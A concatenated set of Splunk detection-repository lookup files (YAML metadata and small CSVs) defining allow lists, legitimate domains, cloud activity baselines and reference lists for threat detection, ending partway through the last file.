--------------------------------------------------------------------------------
/lookups/domain_admins.yml:
--------------------------------------------------------------------------------
1 | name: domain_admins
2 | date: 2024-12-23
3 | version: 2
4 | id: f4b5fe34-a474-4894-bdb9-7e3af6da1d94
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: List of domain admins
8 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/domains.csv:
--------------------------------------------------------------------------------
1 | domain,isValidDomain
2 |
--------------------------------------------------------------------------------
/lookups/domains.yml:
--------------------------------------------------------------------------------
1 | name: domains
2 | date: 2024-12-23
3 | version: 2
4 | id: b34f12f1-952d-4fe1-a5d9-18b81ca32244
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of domains that can be ignored
8 |
--------------------------------------------------------------------------------
/lookups/dynamic_dns_providers_default.yml:
--------------------------------------------------------------------------------
1 | name: dynamic_dns_providers_default
2 | date: 2025-01-29
3 | version: 3
4 | id: 37046407-ef07-48a5-b63d-384fd15b8c4b
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | case_sensitive_match: false
8 | description: A list of dynammic dns providers that should not be modified
9 | match_type:
10 | - WILDCARD(dynamic_dns_domains)
11 |
12 |
--------------------------------------------------------------------------------
/lookups/dynamic_dns_providers_local.csv:
--------------------------------------------------------------------------------
1 | dynamic_dns_domains, isDynDNS_local
--------------------------------------------------------------------------------
/lookups/dynamic_dns_providers_local.yml:
--------------------------------------------------------------------------------
1 | name: dynamic_dns_providers_local
2 | date: 2024-12-23
3 | version: 2
4 | id: b3313546-95ec-4e0e-91ab-b87009c600a4
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | case_sensitive_match: false
8 | description: A list of dynammic dns providers that can be modified
9 | match_type:
10 | - WILDCARD(dynamic_dns_domains)
11 |
12 |
--------------------------------------------------------------------------------
/lookups/hijacklibs.yml:
--------------------------------------------------------------------------------
1 | name: hijacklibs
2 | date: 2024-12-23
3 | version: 2
4 | id: 00990d97-e923-4ae7-9fa0-b5033a8b0164
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of potentially abused libraries in Windows
8 | match_type:
9 | - WILDCARD(library)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/hijacklibs_loaded.yml:
--------------------------------------------------------------------------------
1 | name: hijacklibs_loaded
2 | date: 2024-12-23
3 | version: 2
4 | id: 0a58a703-3a7a-4b27-a82b-f5a61acd3f1a
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of potentially abused libraries in Windows
8 | default_match: false
9 | match_type:
10 | - WILDCARD(library)
11 | - WILDCARD(excludes)
12 | min_matches: 1
13 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/images_to_repository.csv:
--------------------------------------------------------------------------------
1 | image, repository
2 | devsecops/cat_dog_client, splunk/devsecops_poc
3 | devsecops/cat_dog_server, splunk/devsecops_poc
--------------------------------------------------------------------------------
/lookups/images_to_repository.yml:
--------------------------------------------------------------------------------
1 | name: images_to_repository
2 | date: 2024-12-23
3 | version: 2
4 | id: 68205e30-0097-4138-b01d-f4e4d21a86f6
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: Mapping images to repositories
8 |
9 |
--------------------------------------------------------------------------------
/lookups/is_net_windows_file.yml:
--------------------------------------------------------------------------------
1 | name: is_net_windows_file
2 | date: 2024-12-23
3 | version: 2
4 | id: 891cfb79-06cd-455d-9cf8-b4d4de2bff25
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A full baseline of executable files in \Windows\, including sub-directories from Server 2016 and Windows 11. Certain .net binaries may not have been captured due to different Windows SDK's or developer utilities not installed during baseline.
8 | min_matches: 1
9 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/is_nirsoft_software.yml:
--------------------------------------------------------------------------------
1 | name: is_nirsoft_software
2 | date: 2025-04-24
3 | version: 3
4 | id: 28966a08-55e4-4ccb-a20d-dc4cc154b09c
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A subset of utilities provided by NirSoft that may be used by adversaries.
8 | min_matches: 1
9 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/is_suspicious_file_extension_lookup.yml:
--------------------------------------------------------------------------------
1 | name: is_suspicious_file_extension_lookup
2 | date: 2024-12-23
3 | version: 2
4 | id: 183b3599-4fbd-4b76-bff0-9d689ed05e17
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of suspicious extensions for email attachments
8 | match_type:
9 | - WILDCARD(file_name)
--------------------------------------------------------------------------------
/lookups/is_windows_system_file.yml:
--------------------------------------------------------------------------------
1 | name: is_windows_system_file
2 | date: 2024-12-23
3 | version: 2
4 | id: ce238622-4d8f-41a4-a747-5d0adab9c854
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A full baseline of executable files in Windows\System32 and Windows\Syswow64, including sub-directories from Server 2016 and Windows 10.
8 | min_matches: 1
9 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/k8s_container_network_io_baseline.yml:
--------------------------------------------------------------------------------
1 | name: k8s_container_network_io_baseline
2 | date: 2024-12-23
3 | version: 2
4 | id: ce26ec18-c6da-4110-ac3f-8bd239d045b3
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A place holder for a list of used Kuberntes Container Network IO
8 | fields:
9 | - _key
10 | - avg_outbound_network_io
11 | - avg_inbound_network_io
12 | - stdev_outbound_network_io
13 | - stdev_inbound_network_io
14 | - count
15 | - last_seen
--------------------------------------------------------------------------------
/lookups/k8s_container_network_io_ratio_baseline.yml:
--------------------------------------------------------------------------------
1 | name: k8s_container_network_io_ratio_baseline
2 | date: 2024-12-23
3 | version: 2
4 | id: fdb4f703-0378-4803-9300-92f562e1b840
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A place holder for a list of used Kuberntes Container Network IO Ratio
8 | fields:
9 | - _key
10 | - avg_outbound_network_io
11 | - avg_inbound_network_io
12 | - stdev_outbound_network_io
13 | - stdev_inbound_network_io
14 | - count
15 | - last_seen
--------------------------------------------------------------------------------
/lookups/k8s_process_resource_ratio_baseline.yml:
--------------------------------------------------------------------------------
1 | name: k8s_process_resource_ratio_baseline
2 | date: 2024-12-23
3 | version: 2
4 | id: 7bfd9071-fb1f-4673-ab84-6396a0d3d412
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A place holder for a list of used Kuberntes Process Ratios
8 | fields:
9 | - _key
10 | - avg_cpu:mem
11 | - stdev_cpu:mem
12 | - avg_cpu:disk
13 | - stdev_cpu:disk
14 | - avg_mem:disk
15 | - stdev_mem:disk
16 | - avg_cpu:threads
17 | - stdev_cpu:threads
18 | - avg_disk:threads
19 | - avg_disk:threads
20 | - count
21 | - last_seen
--------------------------------------------------------------------------------
/lookups/legit_domains.csv:
--------------------------------------------------------------------------------
1 | domain, isLegit
2 | amazon.com, True
3 | ssl-images-amazon.com, True
4 | facebook.com, True
5 | xx.fbcdn.net, True
6 | github.com, True
7 | githubassets.com, True
8 | instagram.com, True
9 | linkedin.com, True
10 | microsoftonline.com, True
11 | office.com, True
12 | okta.com, True
13 | live.com, True
14 | protonmail.com, True
15 | reddit.com, True
16 | redditstatic.com, True
17 | twitter.com, True
18 | twimg.com, True
19 | google.com, True
20 |
21 |
--------------------------------------------------------------------------------
/lookups/legit_domains.yml:
--------------------------------------------------------------------------------
1 | name: legit_domains
2 | date: 2024-12-23
3 | version: 2
4 | id: 06602f3e-0dcc-47ef-aabc-85a4ad782442
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of legit domains to be used as an ignore list for possible phishing sites
--------------------------------------------------------------------------------
/lookups/linux_tool_discovery_process.yml:
--------------------------------------------------------------------------------
1 | name: linux_tool_discovery_process
2 | date: 2024-12-23
3 | version: 2
4 | id: f0d8b1c8-4ca0-4765-858a-ab0dea68c399
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of suspicious bash commonly used by attackers via scripts
8 | match_type:
9 | - WILDCARD(process)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/local_file_inclusion_paths.yml:
--------------------------------------------------------------------------------
1 | name: local_file_inclusion_paths
2 | date: 2024-12-23
3 | version: 2
4 | id: 10efe0a8-ec54-4f86-8d11-677a7ac65d64
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of interesting files in a local file inclusion attack
8 | match_type:
9 | - WILDCARD(local_file_inclusion_paths)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/lolbas_file_path.yml:
--------------------------------------------------------------------------------
1 | name: lolbas_file_path
2 | date: 2024-12-23
3 | version: 2
4 | id: b88d9c91-33c6-408a-8ef0-00806932f8c5
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of LOLBAS and their file path used in determining if a script or binary is valid on windows, Updated for 2024 from lolbas project.
8 | default_match: false
9 | match_type:
10 | - WILDCARD(lolbas_file_name)
11 | - WILDCARD(lolbas_file_path)
12 | min_matches: 1
13 | max_matches: 1
14 | case_sensitive_match: false
15 |
--------------------------------------------------------------------------------
/lookups/loldrivers.yml:
--------------------------------------------------------------------------------
1 | name: loldrivers
2 | date: 2024-12-23
3 | version: 2
4 | id: a4c71880-bb4a-4e2c-9b44-be70cf181fb3
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of known vulnerable drivers
8 | match_type:
9 | - WILDCARD(driver_name)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/lookup_rare_process_allow_list_default.csv:
--------------------------------------------------------------------------------
1 | process,allow_list
2 | splunk-regmon.exe,true
3 | winword.exe,true
4 | excel.exe,true
5 | outlook.exe,true
6 | powerpnt.exe,true
7 | visio.exe,true
8 |
--------------------------------------------------------------------------------
/lookups/lookup_rare_process_allow_list_default.yml:
--------------------------------------------------------------------------------
1 | name: lookup_rare_process_allow_list_default
2 | date: 2024-12-23
3 | version: 2
4 | id: fc0c452e-47b1-4931-ba41-de5b7c6ed92b
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | case_sensitive_match: false
8 | description: A list of rare processes that are legitimate that is provided by Splunk
9 | match_type:
10 | - WILDCARD(process)
11 | min_matches: 1
--------------------------------------------------------------------------------
/lookups/lookup_rare_process_allow_list_local.csv:
--------------------------------------------------------------------------------
1 | process,allow_list
2 |
--------------------------------------------------------------------------------
/lookups/lookup_rare_process_allow_list_local.yml:
--------------------------------------------------------------------------------
1 | name: lookup_rare_process_allow_list_local
2 | date: 2024-12-23
3 | version: 2
4 | id: 7aec9c17-69b8-4a0b-8f8d-d3ea9b0e2adb
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | case_sensitive_match: false
8 | description: A list of rare processes that are legitimate provided by the end user
9 | match_type:
10 | - WILDCARD(process)
11 | min_matches: 1
12 |
13 |
--------------------------------------------------------------------------------
/lookups/lookup_uncommon_processes_default.yml:
--------------------------------------------------------------------------------
1 | name: lookup_uncommon_processes_default
2 | date: 2024-12-23
3 | version: 2
4 | id: 486eba44-2238-4246-98ca-1ff9b6e1c023
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | case_sensitive_match: false
8 | description: A list of processes that are not common
9 | match_type:
10 | - WILDCARD(process)
11 |
12 |
--------------------------------------------------------------------------------
/lookups/lookup_uncommon_processes_local.csv:
--------------------------------------------------------------------------------
1 | process_name,uncommon_local,category_local,analytic_story_local,kill_chain_phase_local,mitre_attack_local
--------------------------------------------------------------------------------
/lookups/lookup_uncommon_processes_local.yml:
--------------------------------------------------------------------------------
1 | name: lookup_uncommon_processes_local
2 | date: 2024-12-23
3 | version: 2
4 | id: 3ece1ae5-4389-485e-b2b9-4cafdb6924dc
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | case_sensitive_match: false
8 | description: A list of processes that are not common
9 | match_type:
10 | - WILDCARD(process)
11 |
12 |
--------------------------------------------------------------------------------
/lookups/malicious_powershell_strings.yml:
--------------------------------------------------------------------------------
1 | name: malicious_powershell_strings
2 | date: 2025-03-03
3 | version: 2
4 | id: d2fcf9eb-c7a4-4b05-9db4-99c6430d0513
5 | author: Steven Dick
6 | lookup_type: csv
7 | description: A list of commands and commandlets used with known malicious powershell tooling.
8 | match_type:
9 | - WILDCARD(command)
10 | min_matches: 1
11 | max_matches: 1
12 | case_sensitive_match: false
13 |
--------------------------------------------------------------------------------
/lookups/mandatory_job_for_workflow.csv:
--------------------------------------------------------------------------------
1 | workflow_name, job_name
2 | deployment, k8s-security
--------------------------------------------------------------------------------
/lookups/mandatory_job_for_workflow.yml:
--------------------------------------------------------------------------------
1 | name: mandatory_job_for_workflow
2 | date: 2024-12-23
3 | version: 2
4 | id: 76d805e3-b538-43c7-bd8b-f5fd62af596a
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A lookup file that will be used to define the mandatory job for workflow
--------------------------------------------------------------------------------
/lookups/mandatory_step_for_job.csv:
--------------------------------------------------------------------------------
1 | job_name, step_name
2 | k8s-security, Run Kube Hunter
--------------------------------------------------------------------------------
/lookups/mandatory_step_for_job.yml:
--------------------------------------------------------------------------------
1 | name: mandatory_step_for_job
2 | date: 2024-12-23
3 | version: 2
4 | id: ac92a35c-26c4-4f6c-a005-d152b5b343b2
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A lookup file that will be used to define the mandatory step for job
8 |
--------------------------------------------------------------------------------
/lookups/msad_guid_lookup.yml:
--------------------------------------------------------------------------------
1 | name: msad_guid_lookup
2 | date: 2024-12-23
3 | version: 2
4 | id: d8812c9c-9a4c-4b4b-9995-31db35c0b8cf
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A lookup file that will contain translations for AD object ace control access rights guids
8 |
9 |
--------------------------------------------------------------------------------
/lookups/network_acl_activity_baseline.csv:
--------------------------------------------------------------------------------
1 | arn,latestCount,numDataPoints,avgApiCalls,stdevApiCalls
2 |
--------------------------------------------------------------------------------
/lookups/network_acl_activity_baseline.yml:
--------------------------------------------------------------------------------
1 | name: network_acl_activity_baseline
2 | date: 2024-12-23
3 | version: 2
4 | id: 779e0050-a97a-49d2-8aa0-3640d4829b30
5 | author: Splunk Threat Research Team
6 | description: A lookup file that will contain the baseline information for number of
7 | AWS Network ACL Activity
8 | lookup_type: csv
--------------------------------------------------------------------------------
/lookups/previously_seen_api_calls_from_user_roles.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_api_calls_from_user_roles
2 | date: 2024-12-23
3 | version: 2
4 | id: 80620693-2a0f-4c17-8579-2f9a6a2bfa15
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A placeholder for a list of IPs that have access S3
8 | fields:
9 | - _key
10 | - earliest
11 | - latest
12 | - userName
13 | - eventName
14 |
--------------------------------------------------------------------------------
/lookups/previously_seen_aws_cross_account_activity.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_aws_cross_account_activity
2 | date: 2024-12-23
3 | version: 2
4 | id: fffe4494-7356-4448-a8c0-fd266d51f318
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A placeholder for a list of AWS accounts and assumed roles
8 | fields:
9 | - _key
10 | - firstTime
11 | - lastTime
12 | - requestingAccountId
13 | - requestedAccountId
--------------------------------------------------------------------------------
/lookups/previously_seen_aws_regions.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_aws_regions
2 | date: 2024-12-23
3 | version: 2
4 | id: 804c385e-5942-4e0c-87eb-69890483fe73
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A place holder for a list of used AWS regions
8 | fields:
9 | - _key
10 | - earliest
11 | - latest
12 | - awsRegion
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_api_calls_per_user_role.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_cloud_api_calls_per_user_role
2 | date: 2024-12-23
3 | version: 2
4 | id: 3684fed6-6f6a-4830-a3b3-453898fc2a46
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A table of users, commands, and the first and last time that they have been seen
8 | fields:
9 | - _key
10 | - user
11 | - command
12 | - firstTimeSeen
13 | - lastTimeSeen
14 | - enough_data
15 |
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_compute_creations_by_user.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_cloud_compute_creations_by_user
2 | date: 2024-12-23
3 | version: 2
4 | id: cfd1a79b-0b98-42b9-bc0d-2464f74321e5
5 | author: Splunk Threat Research Team
6 | description: A table of previously seen users creating cloud instances
7 | lookup_type: kvstore
8 | fields:
9 | - _key
10 | - firstTimeSeen
11 | - lastTimeSeen
12 | - user
13 | - enough_data
14 |
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_compute_images.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_cloud_compute_images
2 | date: 2024-12-23
3 | version: 2
4 | id: ef8c1c7d-19eb-41d6-b6a1-9fc5ce5fc477
5 | author: Splunk Threat Research Team
6 | description: A table of previously seen Cloud image IDs
7 | lookup_type: kvstore
8 | fields:
9 | - _key
10 | - firstTimeSeen
11 | - lastTimeSeen
12 | - image_id
13 | - enough_data
14 |
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_compute_instance_types.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_cloud_compute_instance_types
2 | date: 2024-12-23
3 | version: 2
4 | id: ae42b151-d5cd-4010-a414-af307f210726
5 | author: Splunk Threat Research Team
6 | description: A place holder for a list of used cloud compute instance types
7 | lookup_type: kvstore
8 | fields:
9 | - _key
10 | - firstTimeSeen
11 | - lastTimeSeen
12 | - instance_type
13 | - enough_data
14 |
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_instance_modifications_by_user.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_cloud_instance_modifications_by_user
2 | date: 2024-12-23
3 | version: 2
4 | id: d44862cb-39af-435e-9a1b-7fd087b0901a
5 | author: Splunk Threat Research Team
6 | description: A table of users seen making instance modifications, and the first and last time that the activity was observed
7 | lookup_type: kvstore
8 | fields:
9 | - _key
10 | - firstTimeSeen
11 | - lastTimeSeen
12 | - user
13 | - enough_data
14 |
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_provisioning_activity_sources.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_cloud_provisioning_activity_sources
2 | date: 2024-12-23
3 | version: 2
4 | id: be904c28-37df-4d3e-955a-ead70a537327
5 | author: Splunk Threat Research Team
6 | description: A table of source IPs, geographic locations, and the first and last time that they have that done cloud provisioning activities
7 | lookup_type: kvstore
8 | fields:
9 | - _key
10 | - src
11 | - City
12 | - Country
13 | - Region
14 | - firstTimeSeen
15 | - lastTimeSeen
16 | - enough_data
17 |
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_regions.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_cloud_regions
2 | date: 2024-12-23
3 | version: 2
4 | id: 4a030fa6-a2eb-4058-9f65-fde1746d1bec
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A table of vendor_region values and the first and last time that they have been observed in cloud provisioning activities
8 | fields:
9 | - _key
10 | - firstTimeSeen
11 | - lastTimeSeen
12 | - vendor_region
13 | - enough_data
14 |
--------------------------------------------------------------------------------
/lookups/previously_seen_cmd_line_arguments.csv:
--------------------------------------------------------------------------------
1 | firstTime,lastTime,process
2 |
--------------------------------------------------------------------------------
/lookups/previously_seen_cmd_line_arguments.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_cmd_line_arguments
2 | date: 2024-12-23
3 | version: 2
4 | id: d8be0813-d09e-4fb8-8999-641d2f4b80e1
5 | author: Splunk Threat Research Team
6 | description: A placeholder for a list of cmd line arugments that been seen before
7 | lookup_type: csv
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_amis_lookup.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_ec2_amis_lookup
2 | date: 2025-01-16
3 | version: 2
4 | id: a0d24031-61b5-44b8-89f9-17f844415b8a
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A place holder for a list of used Previously Seen EC2 AMIs
8 | fields:
9 | - _key
10 | - firstTime
11 | - lastTime
12 | - amiID
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_instance_types_lookup.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_ec2_instance_types_lookup
2 | date: 2025-01-16
3 | version: 2
4 | id: 37507f63-27c5-488e-ba5b-cf38274997ff
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A place holder for a list of used previously seen EC2 instance types.
8 | fields:
9 | - _key
10 | - earliest
11 | - latest
12 | - instanceType
13 |
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_launches_by_user_lookup.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_ec2_launches_by_user_lookup
2 | date: 2025-01-16
3 | version: 2
4 | id: a4a6d268-3c88-4996-b634-2edc33344a0a
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A place holder for a list of previouslyt seen EC2 launches by user
8 | fields:
9 | - _key
10 | - firstTime
11 | - lastTime
12 | - arn
13 |
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_modifications_by_user.csv:
--------------------------------------------------------------------------------
1 | arn,firstTime,lastTime
2 |
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_modifications_by_user.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_ec2_modifications_by_user
2 | date: 2024-12-23
3 | version: 2
4 | id: 546fa1b4-02d4-4e53-96be-0825a9b95625
5 | author: Splunk Threat Research Team
6 | description: A place holder for a list of AWS EC2 modifications done by each user
7 | lookup_type: csv
--------------------------------------------------------------------------------
/lookups/previously_seen_gcp_storage_access_from_remote_ip.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_gcp_storage_access_from_remote_ip
2 | date: 2024-12-23
3 | version: 2
4 | id: 343f625b-79a2-4ce6-82f2-90abde577371
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A place holder for a list of GCP storage access from remote IPs
8 | fields:
9 | - _key
10 | - firstTime
11 | - lastTime
12 | - bucket_name
13 | - remote_ip
14 | - operation
15 | - request_uri
--------------------------------------------------------------------------------
/lookups/previously_seen_provisioning_activity_src.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_provisioning_activity_src
2 | date: 2024-12-23
3 | version: 1
4 | id: aa2db10e-465d-4828-88d4-545a35707b81
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A placeholder for the list of previously seen AWS provisioning activity
8 | fields:
9 | - _key
10 | - firstTime
11 | - lastTime
12 | - sourceIPAddress
13 | - City
14 | - Region
15 | - Country
16 |
--------------------------------------------------------------------------------
/lookups/previously_seen_running_windows_services.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_running_windows_services
2 | date: 2024-12-23
3 | version: 2
4 | id: d997cadc-75ac-48a5-bebc-ccbc94c4023a
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A placeholder for the list of Windows Services running
8 | fields:
9 | - _key
10 | - service
11 | - firstTimeSeen
12 | - lastTimeSeen
13 |
--------------------------------------------------------------------------------
/lookups/previously_seen_s3_access_from_remote_ip.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_S3_access_from_remote_ip
2 | date: 2024-12-23
3 | version: 2
4 | id: 264e5f12-ba04-47d1-bb88-f355a9b2b0e8
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A placeholder for a list of IPs that have access S3
8 | fields:
9 | - _key
10 | - bucket_name
11 | - remote_ip
12 | - earliest
13 | - latest
--------------------------------------------------------------------------------
/lookups/previously_seen_users_console_logins.yml:
--------------------------------------------------------------------------------
1 | name: previously_seen_users_console_logins
2 | date: 2024-12-23
3 | version: 2
4 | id: 308257b9-a0c6-4ca5-9602-efcab78f45ff
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A table of users seen doing console logins, and the first and last time that the activity was observed
8 | fields:
9 | - _key
10 | - firstTime
11 | - lastTime
12 | - user
13 | - src
14 | - City
15 | - Region
16 | - Country
17 |
--------------------------------------------------------------------------------
/lookups/privileged_azure_ad_roles.yml:
--------------------------------------------------------------------------------
1 | name: privileged_azure_ad_roles
2 | date: 2024-12-23
3 | version: 2
4 | id: 4dbf0357-b5fc-4be2-9058-804d6a60b126
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of privileged Azure Active Directory roles, includes updates for 2024 and template IDs.
8 | match_type:
9 | - WILDCARD(azureadrole)
10 | - WILDCARD(azuretemplateid)
11 | min_matches: 1
12 | case_sensitive_match: false
13 |
--------------------------------------------------------------------------------
/lookups/prohibited_apps_launching_cmd.csv:
--------------------------------------------------------------------------------
1 | prohibited_applications,isProhibited
2 | winword.exe,prohibited
3 | EXCEL.EXE,prohibited
4 | OUTLOOK.EXE,prohibited
5 | POWERPNT.EXE,prohibited
6 | visio.exe,prohibited
7 | mspub.exe,prohibited
8 | Acrobat.exe,prohibited
9 | Acrord32.exe,prohibited
10 | chrome.exe,prohibited
11 | iexplore.exe,prohibited
12 | opera.exe,prohibited
13 | firefox.exe,prohibited
14 | java.exe,prohibited
15 | powershell.exe,prohibited
16 | mshta.exe, prohibited
17 | zoom.exe,prohibitied
18 | node.exe,prohibited
19 |
--------------------------------------------------------------------------------
/lookups/prohibited_apps_launching_cmd.yml:
--------------------------------------------------------------------------------
1 | name: prohibited_apps_launching_cmd
2 | date: 2024-12-23
3 | version: 2
4 | id: e6ac9b38-051b-4e40-afd1-16837ddfe7fc
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of processes that should not be launching cmd.exe
8 | match_type:
9 | - WILDCARD(prohibited_applications)
10 |
11 |
--------------------------------------------------------------------------------
/lookups/prohibited_processes.yml:
--------------------------------------------------------------------------------
1 | name: prohibited_processes
2 | date: 2024-12-23
3 | version: 2
4 | id: 310910fe-5158-4f87-8e45-9a307b6ffa8c
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of processes that have been marked as prohibited
--------------------------------------------------------------------------------
/lookups/ransomware_extensions_lookup.yml:
--------------------------------------------------------------------------------
1 | name: ransomware_extensions_lookup
2 | date: 2025-03-18
3 | version: 3
4 | id: eaf9e6bb-55fa-4bab-89a5-b0229638c526
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of file extensions that are associated with ransomware
8 | match_type:
9 | - WILDCARD(Extensions)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/ransomware_notes_lookup.yml:
--------------------------------------------------------------------------------
1 | name: ransomware_notes_lookup
2 | date: 2025-03-03
3 | version: 3
4 | id: 93d9fb06-035e-496c-91d5-7a79543ce1e1
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of file names that are ransomware note files
8 | match_type:
9 | - WILDCARD(ransomware_notes)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/remote_access_software.yml:
--------------------------------------------------------------------------------
1 | name: remote_access_software
2 | date: 2025-04-04
3 | version: 4
4 | id: f3b92ff9-667c-481f-b29d-458e10d48508
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of Remote Access Software
8 | match_type:
9 | - WILDCARD(remote_utility)
10 | - WILDCARD(remote_domain)
11 | - WILDCARD(remote_utility_fileinfo)
12 | min_matches: 1
13 | max_matches: 1
14 | case_sensitive_match: false
15 |
--------------------------------------------------------------------------------
/lookups/remote_access_software_exceptions.yml:
--------------------------------------------------------------------------------
1 | name: remote_access_software_exceptions
2 | date: 2024-12-23
3 | version: 2
4 | id: 2742e885-0706-494b-8f56-a90a3e8d33b4
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A list used to provide global exceptions to remote access monitoring content.
8 | fields:
9 | - _key
10 | - asset
11 | - software
12 | - exception_date
13 | - exception_ttl_days
14 | - exception
15 | - comment
16 |
--------------------------------------------------------------------------------
/lookups/s3_deletion_baseline.yml:
--------------------------------------------------------------------------------
1 | name: s3_deletion_baseline
2 | date: 2024-12-23
3 | version: 2
4 | id: 45e5d266-f80b-43f8-b4a7-87e070da4e70
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A placeholder for the baseline information for AWS S3 deletions
8 | fields:
9 | - _key
10 | - arn
11 | - latestCount
12 | - numDataPoints
13 | - avgApiCalls
14 | - stdevApiCalls
--------------------------------------------------------------------------------
/lookups/security_group_activity_baseline.yml:
--------------------------------------------------------------------------------
1 | name: security_group_activity_baseline
2 | date: 2024-12-23
3 | version: 2
4 | id: 2e110067-48ac-42bd-84a8-a97861edf80d
5 | author: Splunk Threat Research Team
6 | description: A placeholder for the baseline information for AWS security groups
7 | lookup_type: kvstore
8 | fields:
9 | - _key
10 | - arn
11 | - latestCount
12 | - numDataPoints
13 | - avgApiCalls
14 | - stdevApiCalls
--------------------------------------------------------------------------------
/lookups/security_services_lookup.yml:
--------------------------------------------------------------------------------
1 | name: security_services_lookup
2 | date: 2025-01-29
3 | version: 4
4 | id: c9038bad-c77b-4caa-9df2-09dc4454ac77
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of services that deal with security, such as Antivirus, Endpoint Detection and Response, etc.
8 | match_type:
9 | - WILDCARD(service)
10 | min_matches: 1
11 | case_sensitive_match: false
12 |
--------------------------------------------------------------------------------
/lookups/sslbl_ssl_certificate_blacklist.yml:
--------------------------------------------------------------------------------
1 | name: sslbl_ssl_certificate_blacklist
2 | date: 2025-04-03
3 | version: 1
